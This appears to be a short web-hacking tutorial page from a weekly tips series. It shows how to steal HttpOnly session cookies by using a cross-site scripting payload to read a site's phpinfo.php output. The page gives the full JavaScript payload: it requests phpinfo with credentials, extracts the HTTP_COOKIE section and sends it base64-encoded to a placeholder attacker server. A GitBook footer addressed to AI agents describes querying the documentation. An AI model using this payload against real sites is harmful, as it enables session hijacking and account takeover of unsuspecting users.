> For the complete documentation index, see [llms.txt](https://www.webhackingtips.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.webhackingtips.com/weekly-tips/week-8-stealing-httponly-cookies-from-phpinfo.md).

# Week 8 - Stealing HttpOnly Cookies from PHPINFO

## Steal HttpOnly Cookies Through PHPINFO

Have you ever been (\*legally) hacking a web application and found the session cookie to be marked as ‘HttpOnly’? Well with a little bit of luck and some JavaScript, you can still access a user’s session! In week 8 of the Website Hacking Tips + Tricks series, I’ll be showing you how.\
 \
HttpOnly is a flag included in the Set-Cookie HTTP response header and means the cookie is unable to be read/accessed by client-side JavaScript. So Cross-Site Scripting payloads cannot retrieve a user’s session :/\
 \
However, many PHP applications include a PHPINFO file containing information regarding the site’s configuration. Most importantly, the PHPINFO file lists EVERY cookie for the user’s current session, even the ones marked as ‘HttpOnly’.\
 \
We can create a Cross-Site Scripting payload to retrieve the source code of the PHPINFO file and send it to our server. Then we can view the cookies and gain access to the user’s session! This can be accomplished with the below JavaScript:\
 \
`<script>`\
`var req = new XMLHttpRequest();`\
`req.onload = reqListener;`\
`var url = ‘<target-url>/phpinfo.php';`\
`req.withCredentials = true;`\
`req.open('GET', url, false);`\
`req.send();`\
&#x20;\
`function reqListener() {`\
`var req2 = new XMLHttpRequest();`\
`const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1 );`\
`req2.open('GET', '<attacker-server>/?data=' + btoa(sess), false);`\
`req2.send()`\
`};`\
`</script>`\
&#x20;\
All you need to specify is the URL containing the PHPINFO file (\<target-url>), and the server listening for a callback (\<attacker-server>).

![](/files/nsS09mPARmMxTccO2X1t)

![](/files/Onuo4s1acXWRjWf4rDWg)

![SRC: https://aleksikistauri.medium.com/bypassing-httponly-with-phpinfo-file-4e5a8b17129b](/files/NAZxOHLjYrT4kpqcliT8)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/weekly-tips/week-8-stealing-httponly-cookies-from-phpinfo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.